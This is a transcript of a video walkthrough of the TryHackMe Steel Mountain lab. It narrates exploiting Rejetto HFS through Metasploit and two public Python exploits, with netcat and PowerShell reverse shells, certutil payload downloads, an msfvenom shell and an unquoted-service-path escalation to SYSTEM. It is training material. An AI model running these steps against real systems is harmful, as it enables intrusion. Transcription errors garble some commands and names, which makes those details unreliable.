Hi there everybody, my name is Ali and today we are doing Steel Mountain from TryHackMe. This was a Windows machine which is running HTTP file server rejetto as a web server which is vulnerable to remote code execution, and we will use three methods to gain initial foothold. The first of them will be Metasploit, the second one will be a Python script from exploit database, and the third one will be again Python script from exploit database. The difference between both two scripts are that the first one uses PowerShell and the second one uses netcat to gain initial foothold. And in the privilege escalation part, we are having a service running which is Advanced System Care Service version 9, which is vulnerable to unquoted service path exploitation. So we will gain root access by exploiting that service. So that being said, let's jump in. I already have started my machine and the IP address is 10.10.89.131. So I will start off with the nmap scan, nmap-a for aggressive scan, -v for verbosity, and then the IP address of the target, which is 10.10.89.131. This can take some time to run, so I already have run it. Let's see the results. Looking at the results, we see we have port 80 open, the service running is HTTP, and the server is Microsoft IIS HTTPD 8.5. Now normally on Windows, Microsoft IIS does run, and from 8.5 we can say that chances are that this is running Windows 8 or Windows 8.1 or Microsoft Server 2012 or Microsoft Server 2008. We can also go to Google and we can say like we can paste the server version from here and most probably onto the documentation of IIS we will see that what sort of operating system is running. So here we can see that on IIS 8.5 is on Windows 8.1 or IIS 8 is Windows Server 2012. So from this information we can guess our operating system. Then we are having port 135, which is Microsoft Windows Remote Procedure Call. Again, not very interesting. Then we are having 139 and 445. Both of them are SMB. So we can use Smbmap or Smbclient to list the shares. Then we are having port 3389 open, and which is again remote desktop. Then on port 8080 we are having again a web server, which is HTTP file server HTTPD 2.3. Whenever I see some sort of versions, I always go to Google and look for exploits, or I can also do searchsploit to see whether we are having exploits for this version or not. Then we are having again some 49,000 ports open. Again, all of them are Microsoft Windows RPC. Nothing interesting here as well. So let's start our enumeration from first of all SMB. So let's look the shares. So I will come to my terminal. The very first thing I will do is smbmap-h for host, and then the IP address of the target, which is 10.10.89.131. And what it will do is it will tell us that whether there are any sort of shares or not, but right now it says authentication error. So by default it does anonymous login. So we can also do -u and we can specify null authentication. It might be possible that there I can log in, but right now I am having again authentication error. The very next thing I can do is Smbclient -L to list the shares, 4 forward slashes, then the IP address of the web server, and then 2 forward slashes at the end. Chances are that it might run. It will ask you for the root password. If I hit enter here, and again it says access denied, so that's fine. SMB ports are not interesting, so let's go to the web server because only web servers are left. One of them is port 80 and the other one is port 8080. So let's come here. I will type in the IP address to see what's running on port 80, and it says Steel Mountain, and we are having some sort of employee of the month, and we are having an image. I always look for page source as well by pressing Ctrl U onto the keyboard, and we see the image, and most probably in the image we are having some sort of a username as well. So we have username enumeration here, and the username is Bill Harper. So might be possible that we might find some sort of password ahead in our enumeration. So chance are that we might found some login page. So in login, I will go for Bill or Bill Harper as the username, and the password we might found somewhere else. So always username enumeration is very important, looking into the page source and all the places. So what I like to do is I like to download the image. So I will click on the image, copy the URL from here, and I will come to my terminal, and if I do wget and paste the URL of the image, hit enter. This will download the image into my current working directory. And if I do ls, we are having the image. So again, I like to do strings operation onto this one. So chances are that there might be something behind this image, some hidden data, some sort of hidden string which we can read and find something potential. So I will do strings bill harper.png, hit enter, and we will see a lot of garbage. That's fine. Let's scroll up and let's see whether we have anything readable in here. So if I scroll up, I am having nothing right now. And nothing at all. So that's fine. Let's clear the screen and now let's move on with our enumeration. So this was port 80 till now. Let's come here and let's go to port 8080 and let's see what's running there. So port 8080, hit enter, and it looks like that some sort of HFS in title, which is I think so HTTP file server rejetto. We are having a login page, we are having a home page, then we are having search bar, and then we are having some sort of selecting functionality and actions, and we are having also the version here as well, which says HTTP file server 2.3. so now I know that HTTP file server 2.3 is running. So very first thing I will do is I will come here and I will look for exploits. So I will do searchsploit and I will do HTTP file server 2.3, and we get only one instance which says rejetto HTTP file server 2.3.x. Now again, when you are using searchsploit, you need to be very careful, because if you are doing a lot of search, chances are that you might miss something. So now let's say if I do remove 2.3 from here, and if I hit enter, I again get the same result, which is only one exploit for the target. But let's narrow down the results much more. So if I simply copy rejetto from here, and if I do searchsploit on rejetto, if I hit enter, and now you can see I am having some more exploits, and the last time I was having only one exploit for 2.3.x, which is remote command execution, and exploit is in Python. But right now I am having the same version, and I am having exploit number 1, exploit number 2, and exploit number 3, and I am having even more exploits for other versions as well, and the Metasploit module as well. So I would highly recommend that you should use searchsploit wisely. You need to narrow down the results, and you can then look for exploits. So if I clear the screen, do this again, we are having these exploits. The first of them is Metasploit, and then we will be going to look into exploit number 2, which is Python exploit, and exploit number 3, which is again Python exploit. The first one is netcat, and the second one is I think so PowerShell. We will look into this one, but before doing these manual exploits, let's go for automation, and let's use Metasploit to gain initial foothold. But the vulnerability lies here is in the search functionality. So if I search anything random, like let's do who am I, we can see in the URL we are having a search parameter, and our whoami is in the URL, but right now it does not shows me anything. That it says no items match your search query. But if I do like single quote, again I get no items match your search query. If I do double quote, nothing happens. But right now the language of rejetto is somehow different. What it does is it uses some sort of curly braces and other stuff. So what we can do is we can use our null byte. So if I do null byte here with %00, and whatever we will do after null byte, we will be going to execute is it. So if I do null byte, and if I do curly braces and do something strange in this one, so chances are that we might have something strange, and we can see div class macro error. So some sort of strange thing is going on. So what does it does is that null byte terminates the string, and whatever is after null byte we can execute it. So curly braces, angle brackets, and all of these strange stuff are highly dangerous. So after null byte we will use them, and we will gain remote code execution. So let's look Metasploit first, and let's then after Metasploit we will go for manual exploits. So I will load MSF console, And now my Metasploit has been started. So what as a beginner you can do is you can only search for the server name. So I will search for rejetto, and let's see what we get only one module, which is exploit windows http rejetto hfs exec. And let's use this module. So I will use 0, and my module will get loaded, and the payload is already set to windows meterpreter reverse underscore tcp. So let's do options. And doing options, we can see that I need to specify a few things. The first one is this one, which is our host. The second one is our port. It is already set to port 80, but right now my http file server rejetto is not running on port 80. It is running on port 8080. We can see from the nmap scan here. So I will change this port from 80 to 8080. Then by all of the things are already set by default, we need to change one more thing, which is our local host. Now right now my local host is set to my home network. I don't need this home network. I will use my VPN file from TryHackMe, which is most probably tunnel 0. So I will change this one as well. So let's start off with the our host. So I will set our host to my target IP address, which is 10.10.89.131. If I hit enter, I need to change the port as well. So I will set my R port to port 8080, and I need to change my local host as well. So set local host, and to check the local host I can simply do ifconfig, and my local host is 10.9.116.94. So I will come here and I will paste my local host, hit enter, and I think so let's do one options one more time. We are having our host, our port, and local host as well. Let's hit run and let's see whether we get a shell or not. And now it directly says that sending stage, and we are having Meterpreter session 1 open, which means that we have successfully exploited the machine and we have gained initial foothold. So if I do sysinfo, I can execute commands onto the system. If I do shell, now what shell actually does is it will load Windows command prompt, and now I am in Windows command prompt except Meterpreter session. So if I type in who am I here, I am Steel Mountain / build. So I am logged in as a build user, so it means I need to do privilege escalation as well. But right now I will going to show you other methods to gain initial foothold, so I will not go into privilege escalation as right now. So if I do exit from here, I can also load PowerShell as well. So in Meterpreter, I think so to load PowerShell we need to use load PowerShell. Yes, so it does work, and it says loading extension PowerShell, and now we can get into PowerShell shell using like PowerShell underscore shell. So this command will load PowerShell, and now I am into PowerShell shell. So this is why Meterpreter is extremely powerful, but it is extremely automated. So if you are doing certification exams like OSCP or some other ones, they do not allow to use Metasploit. So that's why we will look into manual approach now. So if I control C, yes, exit out from here, exit out from this one as well, and let's come back to our search exploit. And if I do -m, sorry, not -m, rejetto, and let's look this exploit, which is the first one for Python, because it is in Python. So let's see what it says. So I will copy the path here. I will do search exploit -m for mirroring the path into my current working directory. So what it will do is it will download the exploit into my current working directory. So I need to paste in the path. If I hit enter, now it will download the exploit to my current working directory. If I do ls, I do have the exploit here. So let's see what is in the exploit. Looking at the exploit, we can see that it is in Python 2. Then it says that CVE number, which is CVE 2014-6287, and it is tested on Windows Server 2008, Windows 8, and Windows 7. So chances are that it will work for us as well. Then we are having version as well. So version is 2.3.x. So our version is 2.3. So now it looks like that it will work for us as well. So looking at the exploit, we can see that he is doing something with the search functionality, and after search functionality he is using a null byte here, and then after the null byte he is using curly braces, then periods, and then he is executing some sort of command. So this is where the vulnerability is. After null byte we can execute whatever we want. So he's using three things. One of them is save variable, the second one is exe variable, and the third one is exe1 variable. Let's look what these variables are doing. So if we see save variable, so save is executing or saving some sort of VBS script. Then we are having exe is executing VBS2, and VBS2 is again c script.exe, and this one is again executing some sort of VBS script. But the final one and the most interesting one is exe1, and exe1 is executing VBS3. And what VBS3 is doing, it is actually executing netcat.exe. Now normally netcat is installed on Linux. On Windows, if you want to get an initial foothold, if you want to get a reverse shell, you can download netcat.exe from Google, which we will be going to do in 1 minute, and we can simply execute that netcat by uploading it onto the server, execute it with -e command, which he is doing here right now. We can say that please execute cmd.exe and execute cmd.exe and get a connection back to my IP address and local port. Now where our IP address and local port is, it is, I think so, at this place. So we need to change my IP address and my local port. Now I know that my IP address is 10.9.116.94, which is my local IP where my netcat will be listening. So if I do 10.9.116.94, and let's do not change the port, so let's say the port is 443. Now our scripts look fine, but let's see how we can use the script. So the usage is Python, then we need to run the script, then we need to specify the target IP address, then we need to specify the target port number. If I scroll up, there are some notes as well. So it says you need to be using a web server hosting netcat on port 80 here, and we need to host this netcat.exe file onto our web servers, which it will download it. And it says you may need to run it multiple times for success. So okay, so running first time, if we don't get a hit, we can run it second times, and most probably we will be having second time it running. So let's come to our terminal. Now we need to host Python web server, and we need to host netcat.exe. So what I can do is I can do locate netcat.exe. Now on Kali Linux, netcat.exe is already installed onto Kali Linux in users share Windows resources binaries netcat.exe. I am already having it into my current working directory, so that's fine. Then if you are not having your netcat.exe into your current working directory, what you can do is you can simply go to Google, download netcat.exe from GitHub, and move it into your current working directory. So what you can do is you can simply copy this one to your current working directory. So if I do copy, and if I add a period at the end, it will copy it to my current working directory, and we are now having netcat.exe here right now. So now we need to specify Python web server. So if I do Python -m simple http web server on port 80, and if I hit enter, now my web server is listening on port 80. So the first thing is done, our web server is running. Then we need to run the exploit, but before running the exploit we need to use netcat for a listener. So I will split my terminal into three parts. So here I will use netcat. So I will use netcat-nvlp on port 443 because we specified port 443 into our exploit here. So when my netcat will execute, it will give me a connection back on this IP and on this port, which is listening here. And finally, in the last terminal, I will run the exploit, and let's see whether this exploit works or not. So I will do Python, then I will do exploit name, and then I need to specify the target IP address, which is 10.10.89.131, and then we need to specify the port on which target web server is running, and it is port 8080. Let's hit enter and let's see what it says. and now we got a hit onto our web server 4 times, and it is trying to get netcat.exe, and it found netcat.exe. We can see a status code of 200, but right now we didn't got anything here. So let's try one more time, because the exploit script says that you need to run it more than one time. So if I run this exploit one more time, we got a hit again, and this time we can see that my netcat got executed onto the target server, and I got a initial shell. So if I type in who am I am Steel Mountain / build. So the same thing which we got into our Metasploit as well. So this was the second way of getting an initial foothold, and the last way is PowerShell, and most probably that is the script number 3. So let's see that one as well. So I will control C from here right now, and if I do ls, or if I do searchsploit and again rejetto, and this one is the third script. So if I copy the script path, searchsploit -m for mirroring the path into my current working directory, hit enter, and if I do ls, the exploit is in my current working directory. If I do Sublime and open the exploit, let's see what this exploit is doing, and we can see the same exploit. He is using null byte, but this time he is not using netcat, he is using like PowerShell, and the working of this exploit is Python 3 http file server exploit name, which is, and then we need to specify our host, then we need to specify our port, and then we need to specify the command. And we can see the example as well. He is using Python 3 http file server, then the IP address, then the port, and then we need to specify the command in double quotations, and the command which he is doing is Windows full path of PowerShell, and then he is using invoke expression function, which downloads the exploits and run the exploit at it is. So let's try to do this one. Now this will be quite long, but let's see. So for this to work, we need to have some sort of PowerShell script, PowerShell reverse shell. So let's go to Google and let's say whether we have any sort of PowerShell reverse shell. So I will go to say like PowerShell reverse shell dot ps1, or let's do PowerShell reverse shell. Now let's see whether we have anything on payload, all the things. We can also look for like PowerShell, like invoke PowerShell. So if I do invoke PowerShell, because it is a PowerShell script, I think so. So if I do invoke PowerShell, no. So if I do invoke PowerShell reverse shell, yeah, so Nisheng is the one which is containing all of the PowerShell exploits. But if I come back here and if I do, let's change my default theme, default, no, light theme again. Okay, so now the invoke PowerShell tcp.ps1 is the one which actually gives us a reverse shell, and which is the one of the best. So it is, I think so, already installed in Kali Linux, but if not, you can simply come here to GitHub, you can click on raw, and you can download the script from here, and we will analyze the script right now in our Kali Linux. So if I do sublime PowerShell.ps1, and if I paste the script in here, we can see the function which is going to call is invoke PowerShell TCP. And if we see the example how to run this one, so the example says that invoke PowerShell TCP -r for reverse connection, then the IP address, and then the port. So I will not being downloading this and loading this, because I need to get an initial foothold. So whenever we need to get an initial foothold, we need to copy the same command, we need to come at the very bottom, and we need to paste the command as it is, and then we need to change the IP address, because I need to get a reverse connection on 10.9.116.94, and let's do port 4444, because 4444 is fine. Then I think so it's fine. Now I will save this one and close this one, and I will come back here and let's see what the exploit says more. So exploit says that you need to run with the full path. So let's copy this full path and let's see what we need to change here. So I'll copy this all, come to my nmap scan, and I will paste this one here, and it looks fine, but we need to change our port and IP. So if I do IP, my IP is 10.9.116.94, and I need to change this all here as well, and I will say that my exploit name is powershell.ps1. So if I copy this from here and if I do powershell.ps1, and now it looks fine because my web server will be running on port 80, so I don't need to specify any sort of port here. So let's copy this all from here, and now I will come back to my terminal, but before I will change my terminal, and if I do ls, I will set my Python web server again, python-m simple http server on port 80, and now Python web server is running. Let's run the exploit now. So python 3, then the exploit name, which is 49125.py. Then what we need to do, then we need to specify target IP and target port. So let's specify the target IP, which is 10.10.89.131. Then we need to specify target port, and then we need to specify the command. So I will use double quotations, paste in the command here, and now it looks fine to me. Let's see whether it works or not. So let's split the screen again. My Python web server is running, and before running the command, we need to specify netcat session again. So I will do netcat nvlp on port 4444, because in my powershell.ps1 script I added port 4444. So let's start our listener and let's run this one. So if I hit enter and it does not work, I think so, or it does work, and we got a shell back again, and this time it says PowerShell here, and now was the third one by which we can gain initial foothold. So these were the all three methods by which we can gain initial foothold. So now the shell which I will be going to use is netcat one, which is command prompt, because PowerShell is quite amazing, but I like to use is command prompt. So I will quickly close all of this from here. I will come back here and I will do again netcat. So netcat dash nvlp on port 443, and I will run my previous exploit, which was python 39161, then the IP address of the target, which is 10.10.89.131 on port 8080. If I hit enter, hopefully I got a shell, which is command prompt shell, and now let's start our privilege escalation into this shell. So if I do zoom out this a little bit, first of all, let's go to the user directory and let's see whether we have gained access to the shell. So if I go into my C drive, if I do dir, I am having users directory. So cd into users, dir, I am having administrator user, bill user, and a public directory. So let's go into bill user because I am bill user. If I do dir, I need to go into desktop. So desktop, dir, and here is the user flag. So if I do icackles onto this one to see whether we have permissions of writing or reading here. So yes, we can see Steel's Mountain /bill have full access over to this file. This means that we have successfully gained initial foothold. Now for the privilege escalation part, we will use our enumeration again. So who am I? I am Steel Mountain /bin. Then I will do system info to see what sort of information or what sort of operating system it is running. So let's see. So looking at the results from here, we can see that host name is Steel Mountain and Microsoft Windows Server 2012 R2 data center is running. Then we can see the architecture as well, which is x64 based, and we are having a lot of hot fixes as well. So we are having 6 hot fixes, which means that this machine has been updated 6 times. So chances are that there might be not any sort of kernel exploit here, because if there might be no hot fix, what I can do is I can use Windows exploit suggester to see whether this is vulnerable to kernel version or not. We will see hopefully Windows exploits suggested in our next videos, but not right now. And so let's start our enumeration. Now enumerating windows, especially in privilege escalation, is extremely difficult. So you must be looking for any sort of like executable script which is automated like WinPeas, or you can also use PowerShell scripts as well like Power Up, because they are extremely amazing. So let's start our manual enumeration, then I will go for WinPeas. So if I do whoami/all to see what sort of privileges do I have and members I am, what group members I am. So if I see I am a member of built-in users, then I am a member of local account, then anti LM authentication, but right now not any administrator group. That's fine. Let's see whether we have any sort of like SC impersonate privilege, but right now I am having only 2 privileges, which is SC change notify privilege and SC increase working set privilege. So there is no juicy potato or print spoofer exploit, because that works with only SC impersonate privilege. Then I can look for task list. So what sort of task or services are running? So task list. So right now we can see only netcat.executable got hit 4 times, then again cmd.exe 4 times. So chances are that the exploits we were trying were running again and again here. That's fine. Then we can also look for services like net start, I think so. Yeah, so net start tells us that what sort of services are running and what sort of things are running. We can see some potential services and strange ones as well, like EC2 config or like AWS, Amazon. Then we are having a strange service of Advanced System Care Service 9 as well. So we can always look into the exploits for all of these one, and most probably searchsploit or exploit DB or also Google. But let's run some automation scripts. So the automation script which I will be going to do is WinPeas. So if I go to Google and download WinPeas from here, most probably from GitHub, this one. And normally WinPeas has a code here, so I will go to the release page, which is this one. And from here we have linpeas and winpeas, all of the executable files. So I will download winpeas x64.exe. I will copy the link location. I will come to my terminal and I will use wget here. So if I clear this one and if I close this one as well, so I will use wget and paste the link of WinPeas, and hopefully it will download WinPeas for me. But you can also do is you can simply click on this one and it will download this to your downloads folder. So right now I have downloaded into my current working directory. If I do ls, I am having WinPeas x64.exe. So I will start my Python web server again, -m simple http server on port 80, just to transfer this WinPeas over to my target machine. And onto my target machine I will come one directory backward into the home directory of Bill, and I will use like, let's see, can I use certutil? So if I do certutil -url cache -f for file and the web server, which is 10.9.116.94, and if I do like WinPeas, what was it, WinPeas x64, this is the file which I want to download. So if I do WinPeas x64.exe, and we need to specify another output file name. So if I do like simply win.exe just to make it short, and if I hit enter, I got a hit onto my web server, and chances are that it will download WinPeas onto my target system. So now I will zoom this out, and if I do dir, because my certutil command completed successfully, we have win.exe, which means WinPeas has successfully downloaded. So if I run winpeas.exe, and now WinPeas is running and it will do all of the enumeration for me. So let's analyze the results and let's see whether we have anything strange. And the strange thing and very amazing thing about WinPeas is that it shows everything in colors as well. So in Windows version of WinPeas, whatever is in red, chances are that we have a potential privilege escalation vector. So let's see our results. So looking at the results, we are having computer name Steel Mountain, then session name console, username is Bill, then again nothing interesting here, labs not installed, then no antivirus was detected as well, that's fine as well. Then nothing interesting here as well. NTLM signing settings, again nothing interesting. Named pipes, doesn't look interesting. Then we are having users, administrator, and nothing interesting here as well. Local users, administrator, bill, and guest. So that's fine. Then we are having home folders as well. And we are having some sort of auto logon credentials as well. And but the problem is that I am having the credentials for only bill user. So I am really logged in as Bill, so I don't need these credentials for Bill, because if I would be logged in as some other user, so I might escalate my privileges from that user to Bill, but right now I'm already logged in as Bill, so I don't need these credentials. Then let's see what else we find. Some sort of processes here right now. So WinPeas has highlighted everything in red. That is strange as well, because this is my own netcat.exe, so nothing interesting here. Now this is hfs.exe, most probably the web server, which is http file server rejetto, but nothing interesting. Then we are having some services running, and we are having advanced system care service 9. Now whenever I see these versions, some strange things, again I will go to searchsploit and I will say that whether we have any exploit for this one. So let's look whether we have any exploit for advanced system care service 9. So if I do searchsploit and if I do like advanced system, so I will keep it as short as possible. So let's do advanced system, and we do have one exploit, which is advanced system care service 13, and right now it's quite updated, but again the exploit is unquoted service path. So let's see what WinPeas shows us. So in WinPeas, yes, so in WinPeas it also shows us that there are no quotes and spaces detected. Now this is a vulnerability, because if there are no quotes into the path, and we can see that into the path starting from C and ending till advanced system care, there are no quotations and there is nothing. And the service which is running, I think so, is an executable file, which is ascservice.exe. So if there are no quotations and if there are spaces as well, so what actually Windows does is that it will start from here, which is from C drive. It will come here and it will say that, okay, I think so program is an executable, so it will look for program.exe, and it will say that files is one parameter to this program executable. But no, this is not the case. So it will come again and it will say that here are spaces. Then it will look for whether there is any advanced.exe executable. So it will look for advanced.exe, and then it will finally come here and it will look for ascservice.exe. So what we can do is we can create a malicious executable file, and we can add anywhere into the path with the name, and chances are that when we restart the service, it will execute it as system privileges. So if this is vulnerable, my executable will run with system privileges and I will gain root access. But the problem is that for that we need to know that whether we can restart this service or not, or whether we can stop this service, or do we have any sort of control over this service or not one. So now WinPeas and any other tool right now doesn't tell us that whether we have any sort of access over to the service. We can use access check from internals, sorry, from sys internals, but also that's very difficult as well. I have never found access check.executable file anywhere. So what I can do is I can simply directly go and Google stop the service, and let's see whether we have any error or whether we can stop the service. So I will check that one as well. So I will copy the service name, which is advanced system care service 9. Let's scroll at the bottom and I will do service stop, and then I will paste in the name of the service and let's hit enter and let's see what happens. Now it didn't give me any error and it says running, and then it says stoppable, pausable, except shutdown. So it looks like that we can start or stop the service. So let's try to start as well. So if I do service start and then the service name, hit enter, and yes, I think so we have complete access over to this advanced system care service 9 because it says start pending. So chances are that we can exploit this unquoted service path exploitation. Now you need to be very careful because this is an extremely dangerous rabbit hole, because if you are unable to start or restart the service or stop the service, you should never get into this sort of exploitation because it is rabbit hole and you can go nowhere. So right now I know that I can start or restart or stop the service. So I will go into this one and let's see whether we gain root access. So for that we need to create our own malicious file which is executable. And what I will do is, because I know that in advanced system care there are some sort of executables which is ascservice.exe. So let's create a file called ascservice.exe and we will copy my malicious file over to this one and restart the service. And when my service will get restarted, hopefully chances are that I will get root access. So let's come to our terminal again, and now I will create my own executable file using msfvenom. So syntax is msfvenom -p for payload, and I know my Windows is running, so Windows/x64. Then I will do like shell underscore reverse underscore TCP, and then I will specify my local host where I need to listen. So I will listen on 10.9.116.94, which is the IP address given by TryHackMe. Then I will go for local port because we need to specify local port as well. So let's do 4444, and we need to specify the format. So the format will be executable file, and we will specify the output file name as well with, let's do shell, or not shell.exe. We need to specify the same file name which is right now here. So here the file name is ascservice.exe. So I'll copy this one and I will say that please create a file called ascservice.exe, hit enter, and if my syntax is correct, it will create a executable file which will be giving me reverse shell. So let's come back here. Yes, so now my file has been created. Again, I will transfer this file to my target machine. So if I do python -m simple http server on port 80, hit enter, and now my server has been started. Let's come back to our machine, and if I do, I am in right now in my build directory. So let's download it from to my build directory. So certutil -url cache -f http my local web server 10.9.116.94, and then I will specify the service which is executable. So if I do this one, and then I need to specify the output file name as well. So if I do this one and hit enter, I got a hit onto my web server and it says certutil command completed successfully. If I do dir, I am having ascservice.exe here. So what I need to do is simply copy this and override the actual service and then restart it. So upon restarting, chances are that I will get a reverse shell. So let's see where I need to copy it. So let's come back to our WinPeas output, and I will overwrite over to this one. So if I copy this all path, come down here, I will say please copy my this executable, which is asc service.exe, and then I will say that please copy over to this path. So if I hit enter, it says that the system cannot find the file specified. So where I am having some error, let's see. So if I do dir, I am having asc service.exe. So let's try one more time. So copy asc service.exe, then the path like this. I think so. The syntax is incorrect. Let's try with one more time. I think so. I don't need to specify this one here. So let's do one more time. So asc service.exe, then in double quotations I will specify only this directory structure here, and now if I hit enter, okay, so now it is asking me, so I think so this one is the correct syntax. So it is asking me to overwrite. So yes, I will specify that yes, I want to overwrite this one. If I hit enter, it says that the process cannot access the file because it is being used by another process. So chances are that this might be running. So let's stop the service and let's try again. So if I do service stop, and if I do stop the service, which is advanced system care service 9, hit enter, and I think so it has stopped. So let's copy the same command again, and let's see whether it allows me to download here or not. So if I hit enter now, yes, I want to overwrite it, and now it successfully got copied. So now what we need to do is we need to simply start the service again, but before starting the service I will turn my netcat session again. So if I do netcat-nvlp on port 4444, hit enter, and now let's start the service. So I will do sc start and then the service name, which is this one, hit enter, and now you can see that I am having a reverse shell. So if I do who am I am anti-authority system. So now I have gained complete root access over to the system. So this was the vulnerability of unquoted service path exploitation. Let's zoom this out and let's see whether we have access to the flag or not. So if I go into dir, cd into users, cd into administrator, and then cd into desktop, dir, and I do have root.txt file here. So this means that I have successfully completed the flag. If I do icackles on root.txt to see whether I have access over to this one or not, and we can see anti-authority system has full access over root.txt. So this means I have successfully gained access over to the system. So let's come to our TryHackMe answers, and let's see what were the questions and what were the answers. So the very first one is introduction, and it says who is employee of the month. So I think so it was on the main page, which is 89.131. So employee of the month, but there is no name. So I think so let's view the page source. There was a username which is Bill Harper. So I think so Bill Harper might be the answer. So Bill Harper. Okay, so it is the correct answer. Then in the initial access, it says scan the machine with Nmap. What is the other port running a web server on? It is port 8080. Then take a look at the other web server. What file server is running? So file server is running HTTP file server. But right now we can see the statics here. So HTTP file server will not be the right answer. I think so it is rejetto HTTP file server. So rejetto HTTP file server, And yes, this is the correct answer. What is the CVE number? So if we see our exploit code, we can see the CVE number right here in the exploit. It is CVE 2014 and 6287. So let's paste this as it is here, and it says it is the correct, not the correct answer, I think so, from the previous one. Whether we have different CV numbers, CV 2014 6287, and do we need to remove these hyphens? No. Let's go to Google and let's see what is the correct CVE number. So if I do http file server rejetto, and if I do exploit, or let's do CVE. So CVE, let's click on this one. We are having 3 CVEs, but I think so that the one which is having the most impact is this one. We are having this correct, but right now on TryHackMe, do we need to remove this CVE here from here, and let's do this one. Okay, so this is the correct answer. Let's see the hint for this one. It says go to exploitdb.com. Okay, that's fine. Then use Metasploit to gain initial foothold. We use Metasploit as well, then two manual exploits as well. So we have the user flag into the directory. You can simply copy that from there. Then in the privilege escalation part, he is using some sort of like Metasploit to gain initial foothold. Now I didn't did that because if you are preparing for any sort of certification exam like OSCP and I don't know, some other certification exams, so most probably you are not allowed to use Meterpreter, you are not allowed to use Metasploit, you are allowed to use but only one time. But for the best practice, you should never use Meterpreter for those. So that's why I use all of the stuff manually. So he's using Meterpreter upload command to upload a PowerShell script which is power up. It is similar to like WinPeas, but WinPeas is best if you are again going for certification exams. Then he's running with power up from here, and in PowerShell there are a lot of functions. So the function which he is using is invoke all checks, and hopefully it will be extremely similar to WinPeas, so you can do that as well. So here it says take close attention to the can restart option that is set to true. What is the name of the service? So I know that the service which we can restart is advanced system care service 9. So if I do advanced system care service 9, it is the correct answer. And finally, what is the root flag? So we can simply get the root flag as well, and in the access and escalation without Metasploit, okay, so it is using PowerShell here again. So it says what PowerShell-C command could we run to manually find out the service name. So I think so it is get service. So if I do PowerShell-C, and it is, we need to add it in double quotations. I think so it is get service, because to get the services in PowerShell we use get service command. We can also do a Google search over this one, but right now get service is the command. And finally, once this command runs, gain an administrator on our listener. So we have successfully gained access. So this was the box. I hope you liked the video. If you liked it, please subscribe and like, and I will see you in the next video. Take care. Bye.